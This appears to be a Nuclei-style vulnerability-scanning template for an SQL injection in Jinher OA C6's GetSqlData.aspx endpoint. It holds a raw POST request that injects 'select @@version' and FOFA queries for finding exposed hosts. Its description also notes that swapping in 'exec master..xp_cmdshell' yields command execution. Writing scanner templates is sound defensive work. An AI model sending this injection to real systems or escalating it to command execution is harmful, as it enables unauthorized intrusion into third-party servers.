http:
    - matchers:
        - part: status_code
          status:
            - 200
          type: status
        - condition: and
          part: body
          type: word
          words:
            - SQL
      matchers-condition: and
      raw:
        - |
          POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          select @@version
id: jinher-c6-getsqldata-sqli
info:
    author: SleepingBag945
    description: "FOFA: app=\"金和网络-金和OA\" \nFOFA: body=\"src=\\\"/c6/WebResource.axd\"\n利用直接修改sql语句为 exec master..xp_cmdshell 'ipconfig'\n"
    name: 金和 OA C6-GetSqlData.aspx SQL注入
    severity: critical
    tags:
        - jinher
        - 金和oa
        - 金和网络-金和OA
